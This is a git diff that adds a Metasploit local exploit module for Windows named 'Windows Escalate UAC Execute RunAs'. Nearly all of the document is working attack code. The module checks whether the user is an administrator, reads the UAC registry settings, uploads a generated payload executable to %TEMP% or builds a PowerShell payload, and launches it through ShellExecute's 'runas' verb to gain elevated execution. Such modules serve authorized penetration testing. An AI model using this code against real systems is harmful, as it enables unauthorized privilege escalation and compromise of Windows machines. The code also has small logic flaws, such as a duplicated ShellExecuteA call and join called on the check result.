diff --git a/modules/exploits/windows/local/ask.rb b/modules/exploits/windows/local/ask.rb new file mode 100644 index 0000000000..e978384d52 --- /dev/null +++ b/modules/exploits/windows/local/ask.rb @@ -0,0 +1,126 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'msf/core/exploit/exe' +require 'msf/core/exploit/powershell' + +class Metasploit3 < Msf::Exploit::Local + Rank = ExcellentRanking + + include Exploit::EXE + include Post::File + include Exploit::Powershell + + def initialize(info={}) + super( update_info( info, + 'Name' => 'Windows Escalate UAC Execute RunAs', + 'Description' => %q{ + This module will attempt to elevate execution level using + the ShellExecute undocumented RunAs flag to bypass low + UAC settings. + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'mubix', # Original technique + 'b00stfr3ak' # Added powershell option + ], + 'Platform' => [ 'win' ], + 'SessionTypes' => [ 'meterpreter' ], + 'Targets' => [ [ 'Windows', {} ] ], + 'DefaultTarget' => 0, + 'References' => [ + [ 'URL', 'http://www.room362.com/blog/2012/1/3/uac-user-assisted-compromise.html' ] + ], + 'DisclosureDate'=> "Jan 3 2012", + )) + + register_options([ + OptString.new("FILENAME", [ false, "File name on disk"]), + OptString.new("PATH", [ false, "Location on disk %TEMP% used if not set" ]), + OptBool.new("UPLOAD", [ true, "Should the payload be uploaded?", true ]), + OptEnum.new("TECHNIQUE", [ true, "Technique to use", 'EXE', ['PSH', 'EXE'] ]), + ]) + + end + + def check + session.readline + print_status('Checking admin status...') + whoami = session.sys.process.execute('cmd /c whoami /groups', + nil, + {'Hidden' => true, 'Channelized' => true} + ) + cmdout = [] + while(cmdoutput = whoami.channel.read) + cmdout << cmdoutput + end + if cmdout.size == 0 + fail_with(Exploit::Failure::None, "Either whoami is not there or failed to execute") + else + isinadmins = cmdout.join.scan(/S-1-5-32-544/) + if isinadmins.size > 0 + print_good('Part of Administrators group! Continuing...') + return Exploit::CheckCode::Vulnerable + else + print_error('Not in admins group, cannot escalate with this module') + print_error('Exiting...') + return Exploit::CheckCode::Safe + end + end + end + def exploit + admin_check = check + if admin_check.join =~ /safe/ + return Exploit::CheckCode::Safe + end + root_key, base_key = session.sys.registry.splitkey("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System") + open_key = session.sys.registry.open_key(root_key, base_key) + lua_setting = open_key.query_value('EnableLUA') + + if lua_setting.data == 1 + print_status "UAC is Enabled, checking level..." + else + print_good "UAC is not enabled, no prompt for the user" + end + + uac_level = open_key.query_value('ConsentPromptBehaviorAdmin') + + case uac_level.data + when 2 + print_status "UAC is set to 'Always Notify'" + print_status "The user will be prompted, wait for them to click 'Ok'" + when 5 + print_debug "UAC is set to Default" + print_debug "The user will be prompted, wait for them to click 'Ok'" + when 0 + print_good "UAC is not enabled, no prompt for the user" + end + + # + # Generate payload and random names for upload + # + case datastore["TECHNIQUE"] + when "EXE" + exe_payload = generate_payload_exe + payload_filename = datastore["FILENAME"] || Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe" + payload_path = datastore["PATH"] || expand_path("%TEMP%") + cmd_location = "#{payload_path}\\#{payload_filename}" + if datastore["UPLOAD"] + print_status("Uploading #{payload_filename} - #{exe_payload.length} bytes to the filesystem...") + write_file(cmd_location, exe_payload) + else + #print_error("No Upload Path!") + fail_with(Exploit::Failure::BadConfig, "No Upload Path!") + return + end + command, args = cmd_location,nil + session.railgun.shell32.ShellExecuteA(nil,"runas",command,args,nil,5) + when "PSH" + command, args = "cmd.exe", " /c #{cmd_psh_payload(payload.encoded)}" + end + session.railgun.shell32.ShellExecuteA(nil,"runas",command,args,nil,5) + end +end